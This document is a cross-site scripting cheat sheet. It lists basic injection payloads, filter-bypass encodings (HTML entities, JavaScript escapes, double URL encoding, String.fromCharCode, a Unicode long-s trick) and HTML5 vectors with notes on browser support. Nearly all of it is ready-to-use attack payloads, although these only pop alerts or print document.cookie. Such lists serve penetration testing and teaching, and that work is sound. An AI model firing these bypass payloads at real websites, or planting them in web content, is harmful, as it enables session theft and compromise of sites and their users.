XSS: Advanced

Common test payloads

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<a href=javascript:alert(1)>
console.log(/xss/)            // while testing, have the payload write to the console instead of popping alert(), so nothing on the site is disrupted
console.log(document.cookie)
<ſcript>alert(1)</ſcript>     // "long s" (U+017F): a filter matching on the raw input does not see "script", but if the input is uppercased anywhere after the filter ('ſ'.toUpperCase() === 'S'), "ſcript" becomes "SCRIPT". The browser itself does not treat <ſcript> as a script tag.

Encoding bypasses

The code we want to execute:
<img src="" onerror=alert(1)>
1. HTML entities for the double quotes (`&#34;` or `&quot;` is `"`; the HTML tokenizer decodes entities inside attribute values, so a filter looking for a literal quote never sees one):
<img src=&#34;&#34; onerror=alert(1)>
2. JS Unicode escapes (`\uHHHH`) for the angle brackets (JS string literals actually accept four escape forms: octal `\74`, hex `\x3c`, `\u003c` and `\u{3c}`). These are decoded by the JS engine only inside a string literal, so this fits a payload that lands in a JS string (`document.write("...")`, `el.innerHTML = "..."`), not one that lands directly in HTML:
\u003cimg src="" onerror=alert(1)\u003e
3. JS hex escapes (`\xHH`) for the parentheses: `(` is `\x28`, `)` is `\x29`. Because escapes are only decoded inside a string literal, the encoded call has to go through eval/setTimeout/Function; `onerror=alert\x281\x29` written directly in the handler is a syntax error:
<img src="" onerror="eval('alert\x281\x29')">
4. URL encoding, applied twice, if `alert` is filtered. Browsers do not percent-decode attribute values, so this only works when a server-side layer decodes the parameter again after the filter ran (for example one decode in the WAF and a second in the application):
<img src="" onerror=%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34>   // %25%36%31... -> %61%6c%65%72%74 -> alert (add (1) to actually call it)
5. String.fromCharCode for every character (this list spells `<img src="" onerror=alert(123)>`); again only useful from a JS context, e.g. `document.write(String.fromCharCode(...))` or `eval(...)`:
String.fromCharCode(60,105,109,103,32,115,114,99,61,34,34,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,50,51,41,62)
6. Percent-encoding only part of the keyword (`er` in `alert` becomes `%65%72`); same server-side decode requirement as in 4:
<img src="" onerror=al%65%72t(1)>

HTML5 features

<embed src="javascript:alert(1)">  // Firefox, Chrome before 6.0
<image src="javascript:alert(1)"> // IE6
<script src="javascript:alert(1)"></script> // IE6
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> // Firefox, Chrome; the base64 decodes to <script>alert(1)</script>
<input onfocus=alert(1) autofocus> // IE10, Firefox 4.0, Chrome
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"> // IE9, Firefox, Chrome; the javascript: prefix inside an event handler is just a JS label and changes nothing
The browser notes are for the versions listed: current browsers no longer run javascript: URLs from a src attribute, so the first three vectors are historical, while the autofocus/onfocus, data: object and svg onload vectors still work.

Further reading
https://xz.aliyun.com/t/4067
https://momomoxiaoxi.com/2017/10/10/XSS/